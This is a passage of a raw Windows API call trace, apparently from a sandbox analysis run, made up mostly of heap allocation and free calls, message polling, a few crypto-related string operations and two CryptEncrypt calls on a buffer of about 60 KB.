(HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0076.617] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.617] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0076.617] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.617] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0076.617] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0076.617] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0076.617] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0076.617] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.617] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0076.617] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.617] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0076.617] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0076.617] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0076.617] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0076.618] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0076.618] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.618] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.618] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb518 [0076.619] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0076.619] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0076.619] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0076.619] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.619] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0076.619] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0076.619] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0076.619] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0076.619] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0076.619] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.619] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0076.619] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.619] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.619] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8c38 [0076.619] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.619] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb518 [0076.619] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da18 [0076.619] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0076.619] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0076.619] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9708 [0076.619] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0076.619] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0076.619] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0076.619] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0076.619] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0076.619] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.619] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0076.620] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0076.620] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.620] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0076.620] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0076.620] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.620] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.620] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0076.620] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0076.620] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0076.620] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0076.620] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0076.620] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.620] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4f8 [0076.620] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0076.620] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb598 [0076.620] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.620] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4f8 [0076.620] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb598 [0076.620] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0076.620] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.620] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.620] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.620] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0076.620] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0076.620] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4f8 [0076.620] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.620] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0076.621] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0076.621] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.621] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.621] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0076.621] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0076.621] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.621] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.621] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0076.621] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0076.621] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.621] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.621] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.621] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0076.621] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.621] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.621] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.621] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0076.621] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.621] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.621] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0076.621] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.621] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bf8 [0076.621] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.621] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0076.621] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0076.621] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0076.621] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.621] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.621] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0076.621] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0076.621] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0076.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0076.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0076.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.622] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.622] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0076.622] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0076.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0076.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0076.622] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0076.623] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0xeb7c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0xeb80) returned 1 [0076.623] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb488 [0076.623] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0076.623] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0076.623] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0076.623] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0076.623] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0076.623] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5c8 [0076.623] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.623] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0076.623] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0076.623] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0076.624] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.624] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0076.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0076.624] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0076.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0076.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0076.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0076.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0076.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0076.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5d8 [0076.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0076.624] CharLowerBuffW (in: lpsz="byte[60289]", cchLength=0xb | out: lpsz="byte[60289]") returned 0xb [0076.624] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b450 [0076.625] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0076.625] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0076.625] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0076.625] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5d8 [0076.625] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0076.625] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0076.625] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0076.625] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0076.626] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.626] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0076.626] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0076.626] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.626] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96e8 [0076.626] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b450 [0076.626] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0076.626] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0076.627] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0076.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0076.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0076.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0076.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.627] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.627] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0076.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0076.627] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0076.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0076.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0076.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0076.628] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7c2290*, pdwDataLen=0x61e2d8*=0xeb7c, dwBufLen=0xeb80 | out: pbData=0x7c2290*, pdwDataLen=0x61e2d8*=0xeb80) returned 1 [0076.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0076.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0076.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0076.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0076.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0076.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0076.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0076.628] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0076.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0076.630] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.630] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.630] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.630] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0076.630] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0076.630] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.630] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0076.630] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0076.630] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0076.630] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96e8 [0076.630] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b450 [0076.630] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0076.630] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0076.631] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) 